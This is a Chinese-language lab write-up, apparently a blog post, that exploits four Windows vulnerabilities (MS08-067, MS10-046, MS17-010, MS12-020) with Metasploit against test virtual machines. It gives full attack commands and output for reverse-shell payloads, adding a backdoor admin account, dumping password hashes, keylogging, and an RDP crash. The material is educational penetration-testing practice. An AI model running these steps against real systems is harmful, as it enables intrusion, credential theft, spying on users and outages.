![渗透测试-[windows-MS08-067 MS10-046 MS17-010 MS12-020]](https://tnb.tqys.net/uploadfile/img/2023/02/26/e937bb80db4061415e4033082129caf9.jpg)
[windows常见漏洞攻击实验-MS08-067、MS10-046、MS17-010、MS-12-020]
0.实验环境1.MS08-067[RPC]1.1 漏洞描述1.2 主机发现1.3 利用MSF通过ms08-067漏洞渗透目标系统1.4 后渗透利用1.查看权限:2.Shell3.添加账号4.将新账号添加到管理员组中5.截屏2.MS10-046[快捷方式自动执行代码]2.1 漏洞描述2.2 渗透攻击2.3 后渗透利用3.MS17-010[SMB]3.1 漏洞描述3.2 渗透攻击3.2.1 目标发现3.2.2 渗透攻击3.3 后渗透利用3.3.1 获取屏幕快照3.3.2文件上传3.3.3 下载文件3.3.4 进入shell3.3.5 获取口令hash3.3.6 摄像头3.3.7 键盘监听4.MS12-020[RDP]4.1 漏洞描述4.2 目标发现4.3 渗透攻击本文通过MSF对win7靶机和winxp靶机进行了四个常见的微软系统漏洞[MS08-067、MS10-046、MS17-010、MS-12-020]的攻击验证。
0.实验环境
网段:192.168.155.0/24
网卡模式:NAT
攻击机1-Kali-ip:192.168.155.2
攻击机2-mac-ip:192.168.155.1
靶机1winxpSP3英文版-ip:192.168.155.18
靶机2-win7-ip:192.168.155.19
1.MS08-067[RPC]
1.1 漏洞描述
Microsoft Windows Server服务RPC请求缓冲区溢出漏洞。Windows的Server服务在处理特质RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,SYSTEM权限执行任意指令。 对于Windows 2000、XP和Server ,无需认证便可以利用该漏洞;对于Windows Vista和Server ,可能需要认证。
1.2 主机发现
nmap -F 192.168.155.0/24
Starting Nmap 7.91 ( ) at -05-03 03:50 EDTNmap scan report for 192.168.155.1Host is up (0.00084s latency).Not shown: 97 closed portsPORTSTATE SERVICE53/tcp open domain5000/tcp open upnp49152/tcp open unknownMAC Address: FA:FF:C2:C2:93:64 (Unknown)Nmap scan report for 192.168.155.18Host is up (0.0018s latency).Not shown: 93 closed portsPORTSTATE SERVICE25/tcp open smtp80/tcp open http135/tcp open msrpc139/tcp open netbios-ssn443/tcp open https445/tcp open microsoft-ds1025/tcp open NFS-or-IISMAC Address: 00:0C:29:50:ED:13 (VMware)Nmap scan report for 192.168.155.2Host is up (0.0000060s latency).All 100 scanned ports on 192.168.155.2 are closedNmap done: 256 IP addresses (3 hosts up) scanned in 2.23 seconds
目标主机IP:192.168.155.18
端口开放情况:
PORTSTATE SERVICE25/tcp open smtp80/tcp open http135/tcp open msrpc139/tcp open netbios-ssn443/tcp open https445/tcp open microsoft-ds1025/tcp open NFS-or-IISMAC Address: 00:0C:29:50:ED:13 (VMware)
目标端口:445
服务:microsoft-ds
1.3 利用MSF通过ms08-067漏洞渗透目标系统
msfconsolesearch ms08-067use msf6 > use exploit/windows/smb/ms08_067_netapishow targetsset target 0set RHOSTS 192.168.155.18set PAYLOAD windows/meterpreter/reverse_tcpexploit
exploit[*] Started reverse TCP handler on 192.168.155.2:4444[*] 192.168.155.18:445 - Automatically detecting the target...[*] 192.168.155.18:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English[*] 192.168.155.18:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)[*] 192.168.155.18:445 - Attempting to trigger the vulnerability...[*] Sending stage (175174 bytes) to 192.168.155.18[*] Meterpreter session 1 opened (192.168.155.2:4444 -> 192.168.155.18:1074) at -05-03 04:42:05 -0400
1.4 后渗透利用
1.查看权限:
meterpreter > getuidServer username: NT AUTHORITY\SYSTEM
可以看到获得了system权限。
2.Shell
meterpreter > shellProcess 3980 created.Channel 2 created.Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.C:\WINDOWS\system32>
成功进入目标系统的shell环境。
3.添加账号
C:\WINDOWS\system32>net user sxk /addnet user sxk /addThe command completed successfully.
4.将新账号添加到管理员组中
C:\WINDOWS\system32>net localgroup administrators sxk /addnet localgroup administrators sxk /addThe command completed successfully.
用户已经成功添加到目标系统的管理员组中。
5.截屏
meterpreter > screenshotScreenshot saved to: /root/Desktop/YhioHCHD.jpeg
2.MS10-046[快捷方式自动执行代码]
2.1 漏洞描述
Microsoft Windows快捷方式LNK文件自动执行代码漏洞。
Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所制定的目标具有相同效果。 Windows没有正确的处理LNK文件,特制的LNK文件可能导致 Windows自动执行快捷方式文件所指定的代码。这些代码可能位 于USB驱动、本地或远程文件系统、光驱或其他位置,使用资源管理器查看了LNK文件所在的位置就足以触发这个漏洞
受影响系统包括:Windows XP SP3/SP2、Vista SP2/SP1、Server R2/SP2和Win 7。
2.2 渗透攻击
search ms10-046
exploit/windows/browser/ms10_046_shortcut_icon_dllloader
exploit/windows/smb/ms10_046_shortcut_icon_dllloader
use exploit/windows/browser/ms10_046_shortcut_icon_dllloadershow options
Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):NameCurrent Setting Required Description------------------- -------- -----------SRVHOST 0.0.0.0yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.SRVPORT 80yes The daemon port to listen on (do not change)SSLCert no Path to a custom SSL certificate (default is randomly generated)UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).URIPATH /yes The URI to use (do not change).Payload options (windows/meterpreter/reverse_tcp):NameCurrent Setting Required Description------------------- -------- -----------EXITFUNC processyes Exit technique (Accepted: '', seh, thread, process, none)LHOST192.168.155.2 yes The listen address (an interface may be specified)LPORT4444 yes The listen portExploit target:Id Name-- ----0 Automatic
set SRVHOST 192.168.155.2 【注意设置的是kali也就是攻击机的IP】set payload windows/meterpreter /reverse_tcpset LPORT 4444show options
Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):NameCurrent Setting Required Description------------------- -------- -----------SRVHOST 192.168.155.2 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.SRVPORT 80yes The daemon port to listen on (do not change)SSLCert no Path to a custom SSL certificate (default is randomly generated)UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).URIPATH /yes The URI to use (do not change).Payload options (windows/shell/reverse_tcp):NameCurrent Setting Required Description------------------- -------- -----------EXITFUNC processyes Exit technique (Accepted: '', seh, thread, process, none)LHOST192.168.155.2 yes The listen address (an interface may be specified)LPORT4444 yes The listen portExploit target:Id Name-- ----0 Automatic
exploit
在受害xp主机浏览器中访问攻击机kali的ip
http://192.168.155.2:80/
弹出了一个文件夹,其中有一个【.dll文件】和一个【快捷方式】,【双击】快捷方式后,回到Kali 观察效果。
显示获得一台机器的控制权,接下来输入命令【sessions 1】进入到目标系统的【meterpreter】控制界面,漏洞复现成功。
sessions 1
2.3 后渗透利用
参考 ms08-067
3.MS17-010[SMB]
3.1 漏洞描述
漏洞描述:Microsoft Windows SMB Server远程代码执行漏洞
Microsoft Server Message Block 1.0 (SMBv1)服务器处理某些请求时,在实现上存在远程代码执行漏洞,成功利用后可使 攻击者在目标服务器上执行任意代码。如果攻击失败,会导致 拒绝服务,对业务造成一定安全风险。
受影响的系统:Microsoft Windows Server 、Microsoft Windows Server R2、Microsoft Windows Server 、 Microsoft Windows Server R2、Microsoft Windows Server 、Microsoft Windows RT 8.1等等。
3.2 渗透攻击
3.2.1 目标发现
search ms17-010
auxiliary/scanner/smb/smb_ms17_010 辅助模块可以帮助我们发现存在相应漏洞的目标。
use auxiliary/scanner/smb/smb_ms17_010set RHOSTS 192.168.155.18 192.168.155.19 192.168.155.0
扫描发现,192.168.155.19也就是靶机2,win7系统可能存在ms17-010漏洞。
back
退出当前模块
3.2.2 渗透攻击
search ms17-010use exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/meterpreter/reverse_tcpset RHOSTS 192.168.155.19set LHOST 192.168.155.1run
成功拿到system权限。
3.3 后渗透利用
3.3.1 获取屏幕快照
meterpreter > screenshotScreenshot saved to: /Users/xiaokaisi/MYSHXRuM.jpeg
3.3.2文件上传
meterpreter > upload /Users/xiaokaisi/MYSHXRuM.jpeg
[*] uploading : /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg[*] Uploaded 260.89 KiB of 260.89 KiB (100.0%): /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg[*] uploaded : /Users/xiaokaisi/MYSHXRuM.jpeg -> MYSHXRuM.jpeg
pwdC:\Windows\system32
在目标系统C盘中成功上传文件。
3.3.3 下载文件
meterpreter > download drivers/etc/hosts
[*] Downloading: drivers/etc/hosts -> /Users/xiaokaisi/hosts[*] Downloaded 854.00 B of 854.00 B (100.0%): drivers/etc/hosts -> /Users/xiaokaisi/hosts[*] download : drivers/etc/hosts -> /Users/xiaokaisi/hosts
成功下载到目标系统的hosts文件。
3.3.4 进入shell
meterpreter > shell
Process 6872 created.Channel 3 created.Microsoft Windows [�汾 6.1.7601]��Ȩ���� (c) Microsoft Corporation����������Ȩ��C:\Windows\system32>
3.3.5 获取口令hash
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::client:1000:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
破解哈希值:
259745cb123a52aa2e693aaacca2db52
31d6cfe0d16ae931b73c59d7e0c089c0
3.3.6 摄像头
meterpreter > webcam_list [查看摄像头][-] No webcams were foundmeterpreter > webcam_snap [通过摄像头拍照][-] Target does not have a webcammeterpreter > webcam_stream [通过摄像头拍摄视频][-] Target does not have a webcam
3.3.7 键盘监听
比如要对目标系统用户Administrator的键盘进行记录的话,就需要把进程迁移到Administrator的进程。在system权限下,是无法捕获Administrator的键盘记录。
keyscan_start开启键盘监听后,用keyscan_dump进行记录的导出,如果不想监听了才keyscan_stop。不是先keyscan_stop再keyscan_dump。
ps找到合适的进程进行迁移
meterpreter>ps
3668 3608 explorer.exe 【常用的进程】
meterpreter > migrate 3668
[*] Migrating from 1048 to 3668...[*] Migration completed successfully.
meterpreter > getuidServer username: client-PC\client
meterpreter > keyscan_startStarting the keystroke sniffer ...meterpreter > keyscan_dumpDumping captured keystrokes...wo shi client ,<Shift>Ilove china<CR>meterpreter > keyscan_stopStopping the keystroke sniffer...
成功监听到了目标系统上的用户的键盘输入。“wo shi client ,Ilove china”
4.MS12-020[RDP]
4.1 漏洞描述
远程桌面协议存在的一个重大漏洞,入侵者可以通过向远程桌面默认端口(3389)发一系列特定RDP包,从而获取超级管理员权限,进而入侵系统。开放远程桌面服务并使用默认的3389端口的会成为攻击目标。
此外远程桌面协议(RDP)是一个多通道(multi-channal)的协议,可用于做DoS攻击。
根据微软的安全公告,Windows全系列操作系统(WinXP/Vista/Win7/Win2000/ Win/Win)均存在受控威胁。
4.2 目标发现
search ms12-020
auxiliary/scanner/rdp/ms12_020_checkauxiliary/dos/windows/rdp/ms12_020_maxchannelids
use auxiliary/scanner/rdp/ms12_020_check
使用辅助模块的扫描器进行目标发现。
set RHOSTS 192.168.155.0/24set THREADS 20run
扫描发现目标192.168.155.19也就是win7是可能的攻击目标。
4.3 渗透攻击
use auxiliary/dos/windows/rdp/ms12_020_maxchannelidsshow options
Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):Name Current Setting Required Description---- --------------- -------- -----------RHOSTS yes The target host(s), see /rapid7/metasploit-framework/wiki/Using-MetasploitRPORT 3389 yes The target port (TCP)
set RHOSTS 192.168.155.19run
[*] Running module against 192.168.155.19[*] 192.168.155.19:3389 - 192.168.155.19:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS[*] 192.168.155.19:3389 - 192.168.155.19:3389 - 210 bytes sent[*] 192.168.155.19:3389 - 192.168.155.19:3389 - Checking RDP status...[+] 192.168.155.19:3389 - 192.168.155.19:3389 seems down[*] Auxiliary module execution completed
目标主机蓝屏。被迫下线重启,DOS攻击成功。
如果觉得《渗透测试-[windows-MS08-067 MS10-046 MS17-010 MS12-020]》对你有帮助,请点赞、收藏,并留下你的观点哦!
